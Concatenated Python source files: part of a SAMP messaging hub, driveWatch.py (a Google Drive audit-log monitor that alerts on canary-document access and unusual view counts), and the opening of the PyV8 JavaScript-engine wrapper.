self._retry_method(recipient_private_key, recipient_public_id, samp_methodName, arg_params)
except Exception as exc:
warnings.warn("{} call {} from client {} to client {} failed "
"[{},{}]".format(message["samp.mtype"],
msg_id.split(";;")[0],
sender_public_id,
recipient_public_id, type(exc), exc),
SAMPWarning)
def _call_all(self, private_key, msg_tag, message):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
if "samp.mtype" not in message:
raise SAMPProxyError(3, "samp.mtype keyword is missing in "
"message tagged as {}".format(msg_tag))
public_id = self._private_keys[private_key][0]
msg_id = self._call_all_(private_key, public_id, msg_tag, message)
return msg_id
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _call_all_(self, sender_private_key, sender_public_id, msg_tag,
message):
msg_id = {}
msubs = SAMPHubServer.get_mtype_subtypes(message["samp.mtype"])
for mtype in msubs:
if mtype in self._mtype2ids:
for key in self._mtype2ids[mtype]:
if key != sender_private_key:
_msg_id = self._get_new_hub_msg_id(sender_public_id,
msg_tag)
receiver_public_id = self._private_keys[key][0]
msg_id[receiver_public_id] = _msg_id
self._launch_thread(target=self._call_,
args=(sender_private_key,
sender_public_id,
receiver_public_id, _msg_id,
message))
return msg_id
def _call_and_wait(self, private_key, recipient_id, message, timeout):
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
timeout = int(timeout)
now = time.time()
response = {}
msg_id = self._call(private_key, recipient_id, "samp::sync::call",
message)
self._sync_msg_ids_heap[msg_id] = None
while self._is_running:
if timeout > 0 and time.time() - now >= timeout:
del(self._sync_msg_ids_heap[msg_id])
raise SAMPProxyError(1, "Timeout expired!")
if self._sync_msg_ids_heap[msg_id] is not None:
response = copy.deepcopy(self._sync_msg_ids_heap[msg_id])
del(self._sync_msg_ids_heap[msg_id])
break
time.sleep(0.01)
return response
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
def _reply(self, private_key, msg_id, response):
"""
The main method that gets called for replying. This starts up an
asynchronous reply thread and returns.
"""
self._update_last_activity_time(private_key)
if private_key in self._private_keys:
self._launch_thread(target=self._reply_, args=(private_key, msg_id,
response))
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return {}
def _reply_(self, responder_private_key, msg_id, response):
if responder_private_key not in self._private_keys or not msg_id:
return
responder_public_id = self._private_keys[responder_private_key][0]
counter, hub_public_id, recipient_public_id, recipient_msg_tag = msg_id.split(";;", 3)
try:
log.debug("reply {} from {} to {}".format(
counter, responder_public_id, recipient_public_id))
if recipient_msg_tag == "samp::sync::call":
if msg_id in self._sync_msg_ids_heap.keys():
self._sync_msg_ids_heap[msg_id] = response
else:
recipient_private_key = self._public_id_to_private_key(recipient_public_id)
arg_params = (responder_public_id, recipient_msg_tag, response)
samp_method_name = "receiveResponse"
self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params)
except Exception as exc:
warnings.warn("{} reply from client {} to client {} failed [{}]"
.format(recipient_msg_tag, responder_public_id,
recipient_public_id, exc),
SAMPWarning)
def _retry_method(self, recipient_private_key, recipient_public_id, samp_method_name, arg_params):
"""
This method is used to retry a SAMP call several times.
Parameters
----------
recipient_private_key
The private key of the receiver of the call
recipient_public_key
The public key of the receiver of the call
samp_method_name : str
The name of the SAMP method to call
arg_params : tuple
Any additional arguments to be passed to the SAMP method
"""
if recipient_private_key is None:
raise SAMPHubError("Invalid client ID")
from . import conf
for attempt in range(conf.n_retries):
if not self._is_running:
time.sleep(0.01)
continue
try:
if (self._web_profile and
recipient_private_key in self._web_profile_callbacks):
# Web Profile
callback = {"samp.methodName": samp_method_name,
"samp.params": arg_params}
self._web_profile_callbacks[recipient_private_key].put(callback)
else:
# Standard Profile
hub = self._xmlrpc_endpoints[recipient_public_id][1]
getattr(hub.samp.client, samp_method_name)(recipient_private_key, *arg_params)
except xmlrpc.Fault as exc:
log.debug("{} XML-RPC endpoint error (attempt {}): {}"
.format(recipient_public_id, attempt + 1,
exc.faultString))
time.sleep(0.01)
else:
return
# If we are here, then the above attempts failed
error_message = samp_method_name + " failed after " + conf.n_retries + " attempts"
raise SAMPHubError(error_message)
def _public_id_to_private_key(self, public_id):
for private_key in self._private_keys.keys():
if self._private_keys[private_key][0] == public_id:
return private_key
return None
def _get_new_hub_msg_id(self, sender_public_id, sender_msg_id):
with self._thread_lock:
self._hub_msg_id_counter += 1
return "msg#{};;{};;{};;{}".format(self._hub_msg_id_counter,
self._hub_public_id,
sender_public_id, sender_msg_id)
def _update_last_activity_time(self, private_key=None):
with self._thread_lock:
self._last_activity_time = time.time()
if private_key is not None:
self._client_activity_time[private_key] = time.time()
def _receive_notification(self, private_key, sender_id, message):
return ""
def _receive_call(self, private_key, sender_id, msg_id, message):
if private_key == self._hub_private_key:
if "samp.mtype" in message and message["samp.mtype"] == "samp.app.ping":
self._reply(self._hub_private_key, msg_id,
{"samp.status": SAMP_STATUS_OK, "samp.result": {}})
elif ("samp.mtype" in message and
(message["samp.mtype"] == "x-samp.query.by-meta" or
message["samp.mtype"] == "samp.query.by-meta")):
ids_list = self._query_by_metadata(message["samp.params"]["key"],
message["samp.params"]["value"])
self._reply(self._hub_private_key, msg_id,
{"samp.status": SAMP_STATUS_OK,
"samp.result": {"ids": ids_list}})
return ""
else:
return ""
def _receive_response(self, private_key, responder_id, msg_tag, response):
return ""
def _web_profile_register(self, identity_info,
client_address=("unknown", 0),
origin="unknown"):
self._update_last_activity_time()
if not client_address[0] in ["localhost", "127.0.0.1"]:
raise SAMPProxyError(403, "Request of registration rejected "
"by the Hub.")
if not origin:
origin = "unknown"
if isinstance(identity_info, dict):
# an old version of the protocol provided just a string with the app name
if "samp.name" not in identity_info:
raise SAMPProxyError(403, "Request of registration rejected "
"by the Hub (application name not "
"provided).")
# Red semaphore for the other threads
self._web_profile_requests_semaphore.put("wait")
# Set the request to be displayed for the current thread
self._web_profile_requests_queue.put((identity_info, client_address,
origin))
# Get the popup dialogue response
response = self._web_profile_requests_result.get()
# OK, semaphore green
self._web_profile_requests_semaphore.get()
if response:
register_map = self._perform_standard_register()
translator_url = ("http://localhost:{}/translator/{}?ref="
.format(self._web_port, register_map["samp.private-key"]))
register_map["samp.url-translator"] = translator_url
self._web_profile_server.add_client(register_map["samp.private-key"])
return register_map
else:
raise SAMPProxyError(403, "Request of registration rejected by "
"the user.")
def _web_profile_allowReverseCallbacks(self, private_key, allow):
self._update_last_activity_time()
if private_key in self._private_keys:
if allow == "0":
if private_key in self._web_profile_callbacks:
del self._web_profile_callbacks[private_key]
else:
self._web_profile_callbacks[private_key] = queue.Queue()
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _web_profile_pullCallbacks(self, private_key, timeout_secs):
self._update_last_activity_time()
if private_key in self._private_keys:
callback = []
callback_queue = self._web_profile_callbacks[private_key]
try:
while self._is_running:
item_queued = callback_queue.get_nowait()
callback.append(item_queued)
except queue.Empty:
pass
return callback
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
class WebProfileDialog(object):
"""
A base class to make writing Web Profile GUI consent dialogs
easier.
The concrete class must:
1) Poll ``handle_queue`` periodically, using the timer services
of the GUI's event loop. This function will call
``self.show_dialog`` when a request requires authorization.
``self.show_dialog`` will be given the arguments:
- ``samp_name``: The name of the application making the request.
- ``details``: A dictionary of details about the client
making the request.
- ``client``: A hostname, port pair containing the client
address.
- ``origin``: A string containing the origin of the
request.
2) Call ``consent`` or ``reject`` based on the user's response to
the dialog.
"""
def handle_queue(self):
try:
request = self.queue_request.get_nowait()
except queue.Empty: # queue is set but empty
pass
except AttributeError: # queue has not been set yet
pass
else:
if isinstance(request[0], str): # To support the old protocol version
samp_name = request[0]
else:
samp_name = request[0]["samp.name"]
self.show_dialog(samp_name, request[0], request[1], request[2])
def consent(self):
self.queue_result.put(True)
def reject(self):
self.queue_result.put(False)
|
driveWatch.py
|
from __future__ import print_function
import httplib2
import os
import time
import webbrowser
import pytz
import json
import threading
import tempfile
import subprocess
import sys
import logging
import logging.handlers
from datetime import datetime, timedelta
from dateutil.parser import parse
from apiclient import discovery
from oauth2client import client
from oauth2client.file import Storage
from collections import namedtuple
SCOPES = 'https://www.googleapis.com/auth/admin.reports.audit.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Reports API Python Quickstart'
EVENT_NAMES = ['create', 'upload', 'edit', 'view', 'rename',
'move', 'add_to_folder', 'remove_from_folder',
'trash', 'delete', 'untrash', 'download', 'preview',
'print', 'change_acl_editors', 'change_document_access_scope',
'change_document_visibility', 'change_user_access',
'team_drive_membership_change']
VIEW_THRESHOLD = 30
MAX_RESULTS = 100
BASELINE_PERCENT = 0.2 # percent to increase baseline by
TOKEN_ALERT=0
USER_ALERT=1
BASELINE_ALERT=2
THRESHOLD_ALERT=3
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class GSuiteTokens(object):
__metaclass__ = Singleton
def __init__(self, cfg_file="config.json"):
self.cfg_file = cfg_file
self.users_view_map = {}
self.document_tokens = {}
self.user_tokens = {}
self.event_loop_thread = None
self.logging = False
self.syslog_logger = None
self.user_baseline_map = {}
dir_name = tempfile.mkdtemp()
self.logfile_doc_tokens = os.path.join(dir_name, 'doc_tokens.log')
self.logfile_user_tokens = os.path.join(dir_name, 'user_tokens.log')
self.logfile_all_activity = os.path.join(dir_name, 'all_activity.log')
self.logfile_user_activity = os.path.join(dir_name, 'user_activity.log')
open(self.logfile_user_tokens, 'a').close()
open(self.logfile_all_activity, 'a').close()
open(self.logfile_user_activity, 'a').close()
open(self.logfile_doc_tokens, 'a').close()
# subprocess.call(['sh', 't.sh', self.logfile_doc_tokens,
# self.logfile_user_tokens, self.logfile_all_activity,
# self.logfile_user_activity])
self.load_cfg()
credentials = self.get_credentials()
http = credentials.authorize(httplib2.Http())
self.service = discovery.build('admin', 'reports_v1', http=http)
def load_cfg(self):
with open(self.cfg_file) as f:
cfg = json.load(f)
if 'document_tokens' not in cfg and 'user_tokens' not in cfg:
raise Exception('No token configuration found')
if 'document_tokens' in cfg:
for document_token in cfg['document_tokens']:
self.document_tokens[document_token['document_id']] = document_token['events']
if 'user_tokens' in cfg:
for user_token in cfg['user_tokens']:
self.user_tokens[user_token['user_email']] = user_token['events']
if 'logging' in cfg:
if 'enabled' in cfg['logging']:
try:
self.logging = bool(int(cfg['logging']['enabled']))
except:
pass
if 'syslog' in cfg:
if 'enabled' in cfg['syslog']:
try:
if bool(int(cfg['syslog']['enabled'])):
self.syslog_logger = logging.getLogger('rsyslog')
rsyslog_h = rsyslog_handler()
self.syslog_logger.addHandler(rsyslog_handler())
self.syslog_logger.setLevel(logging.INFO)
except:
pass
def get_credentials(self):
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'admin-reports_v1-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES,redirect_uri='urn:ietf:wg:oauth:2.0:oob')
flow.user_agent = APPLICATION_NAME
auth_uri = flow.step1_get_authorize_url()
webbrowser.open(auth_uri)
auth_code = raw_input('Enter the authentication code: ')
credentials = flow.step2_exchange(auth_code)
store.put(credentials)
return credentials
def start_event_loop(self):
if not self.event_loop_thread:
self.event_loop_thread = threading.Thread(target=self._event_loop)
self.event_loop_thread.start()
def stop_event_loop(self):
if self.event_loop_thread:
self.event_loop_thread.stop()
def _event_loop(self):
print("[*] Starting event loop...")
start_time = datetime.utcnow()
d = datetime.utcnow()
d_with_timezone = d.replace(tzinfo=pytz.UTC)
d = d_with_timezone.isoformat()
self.build_user_basline()
print("[*] Drivewatch Ready!")
while True:
results = self.service.activities().list(
startTime=d, userKey='all', applicationName='drive').execute()
activities = results.get('items', [])
if activities:
d = datetime.utcnow()
d_with_timezone = d.replace(tzinfo=pytz.UTC)
d = d_with_timezone.isoformat()
for activity in activities:
for event in activity['events']:
self.token_document(activity['actor']['email'], event)
self.token_user(activity['actor']['email'], event)
self.log_drive_events(activity)
self.user_view_counts(event, activity['actor']['email'], self.service)
if (datetime.utcnow() - start_time) > timedelta(hours=24):
self.build_user_basline()
time.sleep(5)
def build_user_basline(self):
print("[*] Building user baseline...")
tmp_user_view_map = {}
def parse_activities(activities):
for activity in activities:
# get actor info
is_view = False
doc_id = None
for event in activity['events']:
if (event['name'] == 'view'):
is_view = True
for param in event['parameters']:
if param['name'] == 'doc_id':
doc_id = param['value']
break
if doc_id and is_view:
break
try:
actor = activity['actor']['email']
if is_view and actor:
dt = parse(activity['id']['time'])
key = "{actor},{date}".format(actor=actor, date=dt.strftime('%Y-%d-%m'))
if not tmp_user_view_map.get(key):
tmp_user_view_map[key] = []
if not doc_id in tmp_user_view_map[key]:
tmp_user_view_map[key].append(doc_id)
except:
pass
results = self.service.activities().list(
userKey='all', applicationName='drive', maxResults=MAX_RESULTS).execute()
activities = results.get('items', [])
parse_activities(activities)
next_page_token = results.get('nextPageToken', None)
while next_page_token:
results = self.service.activities().list(
userKey='all', applicationName='drive', maxResults=MAX_RESULTS, pageToken=next_page_token).execute()
activities = results.get('items', [])
parse_activities(activities)
next_page_token = results.get('nextPageToken', None)
tmp_map = {}
for key, value in tmp_user_view_map.iteritems():
actor = key.split(',')[0]
if not tmp_map.get(actor):
tmp_map[actor] = []
tmp_map[actor].append(len(value))
for key, value in tmp_map.iteritems():
tmp_map[key] = round(1.0 * sum(value)/len(value))
self.user_baseline_map = tmp_map.copy()
def token_document(self, actor, event):
if self.document_tokens:
owner_email = None
for param in event['parameters']:
if param['name'] == 'owner' and param['value'] in self.user_tokens:
owner_email = param['value']
break
for param in event['parameters']:
if param['name'] == 'doc_id' and \
(param['value'] in self.document_tokens and
event['name'] in self.document_tokens[param['value']]):
self.alert(TOKEN_ALERT, owner=owner_email, doc_id=param['value'], event_type=event['name'], actor=actor)
def token_user(self, actor, event):
if self.user_tokens:
owner_email = None
for param in event['parameters']:
if param['name'] == 'owner' and param['value'] in self.user_tokens:
owner_email = param['value']
break
for param in event['parameters']:
if param['name'] == 'doc_id' and owner_email and \
event['name'] in self.user_tokens[owner_email]:
self.alert(USER_ALERT, actor=actor, owner=owner_email, doc_id=param['value'], event_type=event['name'])
def log_drive_events(self, activity):
if self.logging:
print(activity)
def user_view_counts(self, event, actor, service):
if (event['name'] == 'view'):
if actor in self.users_view_map:
views_and_docs = self.users_view_map[actor]
if (datetime.now() - views_and_docs[0]) > timedelta(hours=24):
self.users_view_map[actor] = (datetime.now(), [])
return
old_time = views_and_docs[0]
docs = views_and_docs[1]
for param in event['parameters']:
if param['name'] == 'doc_id':
doc_id = param['value']
if not doc_id in docs:
docs.append(param['value'])
self.users_view_map[actor] = (old_time, docs)
num_docs_viewed = len(docs)
if num_docs_viewed > VIEW_THRESHOLD:
start_time = datetime.utcnow() - timedelta(hours=24)
start_time_tz = start_time.replace(tzinfo=pytz.UTC)
start_time = start_time_tz.isoformat()
results = service.activities().list(
startTime=start_time, userKey='all', applicationName='drive').execute()
activities = results.get('items', [])
self.alert(THRESHOLD_ALERT, actor=actor, num_docs_viewed=num_docs_viewed)
self.users_view_map[actor] = (datetime.now(), [])
else:
actor_baseline = self.user_baseline_map.get(actor)
if actor_baseline and docs:
baseline = round(actor_baseline*BASELINE_PERCENT) + actor_baseline
if num_docs_viewed > baseline:
self.alert(BASELINE_ALERT, actor=actor, num_docs_viewed=num_docs_viewed, baseline=baseline)
else:
self.users_view_map[actor] = (datetime.now(), [])
def alert(self, alert_type, owner=None, actor=None, num_docs_viewed=None, baseline=None, doc_id=None, event_type=None):
alert_msg = None
if alert_type == TOKEN_ALERT:
alert_msg = "Token fired! {owner}'s document: {doc_id} had the event occur: {event_type} which was made by user: {actor}".format(
owner=owner,
actor=actor,
doc_id=doc_id,
event_type=event_type
)
# TODO write to log file?
elif alert_type == USER_ALERT:
# don't alert when user is doing stuff in his own drive
if owner == actor:
return
alert_msg = "User token fired! {owner}'s document: {doc_id} had the event occur: {event_type} which was made by user: {actor}".format(
owner=owner,
actor=actor,
doc_id=doc_id,
event_type=event_type
)
# TODO write to log file?
elif alert_type == BASELINE_ALERT:
alert_msg = "Actor Baseline Exceeded! {actor}'s view activity was {num_docs_viewed} where baseline was {baseline}.".format(
actor=actor,
num_docs_viewed=num_docs_viewed,
baseline=baseline
)
# TODO write to log file?
elif alert_type == THRESHOLD_ALERT:
alert_msg = "View Threshold Exceeded! {actor}'s view activity was {num_docs_viewed} where the threshold is {threshold}.".format(
actor=actor,
num_docs_viewed=num_docs_viewed,
threshold=VIEW_THRESHOLD
)
# TODO write to log file?
print(alert_msg)
if self.syslog_logger:
self.syslog_logger.critical(alert_msg)
class MySysLogHandler(logging.handlers.SysLogHandler):
def __init__(self, *kwargs):
from sys import platform
address = '/dev/log'
if platform == "darwin":
address = '/var/run/syslog'
super(MySysLogHandler, self).__init__(address=address, facility=logging.handlers.SysLogHandler.LOG_LOCAL0)
def emit(self, record):
priority = self.encodePriority(self.facility, self.mapPriority(record.levelname))
record.ident = "drivewatch:"
super(MySysLogHandler, self).emit(record)
def rsyslog_handler():
handler = MySysLogHandler()
handler.formatter = logging.Formatter(fmt="%(ident)s %(levelname)s: %(message)s")
return handler
if __name__ == '__main__':
print("[*] Starting Drivewatch...")
if len(sys.argv) >= 2:
g = GSuiteTokens(sys.argv[1])
else:
g = GSuiteTokens()
g.start_event_loop()
|
PyV8.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
if is_py3k:
import _thread as thread
from io import StringIO
str = str
raw_input = input
else:
import _thread
try:
from io import StringIO
except ImportError:
from io import StringIO
try:
import json
except ImportError:
import simplejson as json
import _PyV8
__author__ = 'Flier Lu <flier.lu@gmail.com>'
__version__ = '1.0'
__all__ = ["ReadOnly", "DontEnum", "DontDelete", "Internal",
"JSError", "JSObject", "JSArray", "JSFunction",
"JSClass", "JSEngine", "JSContext",
"JSObjectSpace", "JSAllocationAction",
"JSStackTrace", "JSStackFrame", "profiler",
"JSExtension", "JSLocker", "JSUnlocker", "AST"]
class JSAttribute(object):
def __init__(self, name):
self.name = name
def __call__(self, func):
setattr(func, "__%s__" % self.name, True)
return func
ReadOnly = JSAttribute(name='readonly')
DontEnum = JSAttribute(name='dontenum')
DontDelete = JSAttribute(name='dontdel')
Internal = JSAttribute(name='internal')
class JSError(Exception):
def __init__(self, impl):
Exception.__init__(self)
self._impl = impl
def __str__(self):
return str(self._impl)
def __unicode__(self, *args, **kwargs):
return str(self._impl)
def __getattribute__(self, attr):
impl = super(JSError, self).__getattribute__("_impl")
try:
return getattr(impl, attr)
except AttributeError:
return super(JSError, self).__getattribute__(attr)
RE_FRAME = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?\)")
RE_FUNC = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^\)]+)\)")
RE_FILE = re.compile(r"\s+at\s(?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?")
@staticmethod
def parse_stack(value):
stack = []
def int_or_nul(value):
return int(value) if value else None
for line in value.split('\n')[1:]:
m = JSError.RE_FRAME.match(line)
if m:
stack.append((m.group('func'), m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
m = JSError.RE_FUNC.match(line)
if m:
stack.append((m.group('func'), m.group('file'), None, None))
continue
m = JSError.RE_FILE.match(line)
if m:
stack.append((None, m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
assert line
return stack
@property
def frames(self):
return self.parse_stack(self.stackTrace)
_PyV8._JSError._jsclass = JSError
JSObject = _PyV8.JSObject
JSArray = _PyV8.JSArray
JSFunction = _PyV8.JSFunction
# contribute by e.generalov
JS_ESCAPABLE = re.compile(r'([^\x00-\x7f])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
def _js_escape_unicode_re_callack(match):
n = ord(match.group(0))
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
def js_escape_unicode(text):
"""Return an ASCII-only representation of a JavaScript string"""
if isinstance(text, str):
if HAS_UTF8.search(text) is None:
return text
text = text.decode('UTF-8')
return str(JS_ESCAPABLE.sub(_js_escape_unicode_re_callack, text))
class JSExtension(_PyV8.JSExtension):
def __init__(self, name, source, callback=None, dependencies=[], register=True):
_PyV8.JSExtension.__init__(self, js_escape_unicode(name), js_escape_unicode(source), callback, dependencies, register)
def func_apply(self, thisArg, argArray=[]):
if isinstance(thisArg, JSObject):
return self.invoke(thisArg, argArray)
this = JSContext.current.eval("(%s)" % json.dumps(thisArg))
return self.invoke(this, argArray)
JSFunction.apply = func_apply
class JSLocker(_PyV8.JSLocker):
def __enter__(self):
self.enter()
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be acquired before enter the context")
return self
def __exit__(self, exc_type, exc_value, traceback):
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be released after leave the context")
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSUnlocker(_PyV8.JSUnlocker):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSClass(object):
__properties__ = {}
__watchpoints__ = {}
def __getattr__(self, name):
if name == 'constructor':
return JSClassConstructor(self.__class__)
if name == 'prototype':
return JSClassPrototype(self.__class__)
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[0], collections.Callable):
return prop[0]()
raise AttributeError(name)
def __setattr__(self, name, value):
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[1], collections.Callable):
return prop[1](value)
return object.__setattr__(self, name, value)
def toString(self):
"Returns a string representation of an object."
return "[object %s]" % self.__class__.__name__
def toLocaleString(self):
"Returns a value as a string value appropriate to the host environment's current locale."
return self.toString()
def valueOf(self):
"Returns the primitive value of the specified object."
return self
def hasOwnProperty(self, name):
"Returns a Boolean value indicating whether an object has a property with the specified name."
return hasattr(self, name)
def isPrototypeOf(self, obj):
"Returns a Boolean value indicating whether an object exists in the prototype chain of another object."
raise NotImplementedError()
def __defineGetter__(self, name, getter):
"Binds an object's property to a function to be called when that property is looked up."
self.__properties__[name] = (getter, self.__lookupSetter__(name))
def __lookupGetter__(self, name):
"Return the function bound as a getter to the specified property."
return self.__properties__.get(name, (None, None))[0]
def __defineSetter__(self, name, setter):
"Binds an object's property to a function to be called when an attempt is made to set that property."
self.__properties__[name] = (self.__lookupGetter__(name), setter)
def __lookupSetter__(self, name):
"Return the function bound as a setter to the specified property."
return self.__properties__.get(name, (None, None))[1]
def watch(self, prop, handler):
"Watches for a property to be assigned a value and runs a function when that occurs."
self.__watchpoints__[prop] = handler
def unwatch(self, prop):
"Removes a watchpoint set with the watch method."
del self.__watchpoints__[prop]
class JSClassConstructor(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def name(self):
return self.cls.__name__
def toString(self):
return "function %s() {\n [native code]\n}" % self.name
def __call__(self, *args, **kwds):
return self.cls(*args, **kwds)
class JSClassPrototype(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def constructor(self):
return JSClassConstructor(self.cls)
@property
def name(self):
return self.cls.__name__
class JSDebugProtocol(object):
"""
Support the V8 debugger JSON based protocol.
<http://code.google.com/p/v8/wiki/DebuggerProtocol>
"""
class Packet(object):
REQUEST = 'request'
RESPONSE = 'response'
EVENT = 'event'
def __init__(self, payload):
self.data = json.loads(payload) if type(payload) in [str, str] else payload
@property
def seq(self):
return self.data['seq']
@property
def type(self):
return self.data['type']
class Request(Packet):
@property
def cmd(self):
return self.data['command']
@property
def args(self):
return self.data['args']
class Response(Packet):
@property
def request_seq(self):
return self.data['request_seq']
@property
def cmd(self):
return self.data['command']
@property
def body(self):
return self.data['body']
@property
def running(self):
return self.data['running']
@property
def success(self):
return self.data['success']
@property
def message(self):
return self.data['message']
class Event(Packet):
@property
def event(self):
return self.data['event']
@property
def body(self):
return self.data['body']
def __init__(self):
self.seq = 0
def nextSeq(self):
seq = self.seq
self.seq += 1
return seq
def parsePacket(self, payload):
obj = json.loads(payload)
return JSDebugProtocol.Event(obj) if obj['type'] == 'event' else JSDebugProtocol.Response(obj)
class JSDebugEvent(_PyV8.JSDebugEvent):
class FrameData(object):
def __init__(self, frame, count, name, value):
self.frame = frame
self.count = count
self.name = name
self.value = value
def __len__(self):
return self.count(self.frame)
def __iter__(self):
for i in range(self.count(self.frame)):
yield (self.name(self.frame, i), self.value(self.frame, i))
class Frame(object):
def __init__(self, frame):
self.frame = frame
@property
def index(self):
return int(self.frame.index())
@property
def function(self):
return self.frame.func()
@property
def receiver(self):
return self.frame.receiver()
@property
def isConstructCall(self):
return bool(self.frame.isConstructCall())
@property
def isDebuggerFrame(self):
return bool(self.frame.isDebuggerFrame())
@property
def argumentCount(self):
return int(self.frame.argumentCount())
def argumentName(self, idx):
return str(self.frame.argumentName(idx))
def argumentValue(self, idx):
return self.frame.argumentValue(idx)
@property
def arguments(self):
return JSDebugEvent.FrameData(self, self.argumentCount, self.argumentName, self.argumentValue)
def localCount(self, idx):
return int(self.frame.localCount())
def localName(self, idx):
return str(self.frame.localName(idx))
def localValue(self, idx):
return self.frame.localValue(idx)
@property
def locals(self):
return JSDebugEvent.FrameData(self, self.localCount, self.localName, self.localValue)
@property
def sourcePosition(self):
return self.frame.sourcePosition()
@property
def sourceLine(self):
return int(self.frame.sourceLine())
@property
def sourceColumn(self):
return int(self.frame.sourceColumn())
@property
def sourceLineText(self):
return str(self.frame.sourceLineText())
def evaluate(self, source, disable_break = True):
return self.frame.evaluate(source, disable_break)
@property
def invocationText(self):
return str(self.frame.invocationText())
@property
def sourceAndPositionText(self):
return str(self.frame.sourceAndPositionText())
@property
def localsText(self):
return str(self.frame.localsText())
def __str__(self):
return str(self.frame.toText())
class Frames(object):
def __init__(self, state):
self.state = state
def __len__(self):
return self.state.frameCount
def __iter__(self):
for i in range(self.state.frameCount):
yield self.state.frame(i)
class State(object):
def __init__(self, state):
self.state = state
@property
def frameCount(self):
return int(self.state.frameCount())
def frame(self, idx = None):
return JSDebugEvent.Frame(self.state.frame(idx))
@property
def selectedFrame(self):
return int(self.state.selectedFrame())
@property
def frames(self):
return JSDebugEvent.Frames(self)
def __repr__(self):
s = StringIO()
try:
for frame in self.frames:
s.write(str(frame))
return s.getvalue()
finally:
s.close()
class DebugEvent(object):
pass
class StateEvent(DebugEvent):
__state = None
@property
def state(self):
if not self.__state:
self.__state = JSDebugEvent.State(self.event.executionState())
return self.__state
class BreakEvent(StateEvent):
type = _PyV8.JSDebugEvent.Break
def __init__(self, event):
self.event = event
class ExceptionEvent(StateEvent):
type = _PyV8.JSDebugEvent.Exception
def __init__(self, event):
self.event = event
class NewFunctionEvent(DebugEvent):
type = _PyV8.JSDebugEvent.NewFunction
def __init__(self, event):
self.event = event
class Script(object):
def __init__(self, script):
self.script = script
@property
def source(self):
return self.script.source()
@property
def id(self):
return self.script.id()
@property
def name(self):
return self.script.name()
@property
def lineOffset(self):
return self.script.lineOffset()
@property
def lineCount(self):
return self.script.lineCount()
@property
def columnOffset(self):
return self.script.columnOffset()
@property
def type(self):
return self.script.type()
def __repr__(self):
return "<%s script %s @ %d:%d> : '%s'" % (self.type, self.name,
self.lineOffset, self.columnOffset,
self.source)
class CompileEvent(StateEvent):
def __init__(self, event):
self.event = event
@property
def script(self):
if not hasattr(self, "_script"):
setattr(self, "_script", JSDebugEvent.Script(self.event.script()))
return self._script
def __str__(self):
return str(self.script)
class BeforeCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.BeforeCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "before compile script: %s\n%s" % (repr(self.script), repr(self.state))
class AfterCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.AfterCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "after compile script: %s\n%s" % (repr(self.script), repr(self.state))
onMessage = None
onBreak = None
onException = None
onNewFunction = None
onBeforeCompile = None
onAfterCompile = None
class JSDebugger(JSDebugProtocol, JSDebugEvent):
def __init__(self):
JSDebugProtocol.__init__(self)
JSDebugEvent.__init__(self)
def __enter__(self):
self.enabled = True
return self
def __exit__(self, exc_type, exc_value, traceback):
self.enabled = False
@property
def context(self):
if not hasattr(self, '_context'):
self._context = JSContext(ctxt=_PyV8.debug().context)
return self._context
def isEnabled(self):
return _PyV8.debug().enabled
def setEnabled(self, enable):
dbg = _PyV8.debug()
if enable:
dbg.onDebugEvent = self.onDebugEvent
dbg.onDebugMessage = self.onDebugMessage
dbg.onDispatchDebugMessages = self.onDispatchDebugMessages
else:
dbg.onDebugEvent = None
dbg.onDebugMessage = None
dbg.onDispatchDebugMessages = None
dbg.enabled = enable
enabled = property(isEnabled, setEnabled)
def onDebugMessage(self, msg, data):
if self.onMessage:
self.onMessage(json.loads(msg))
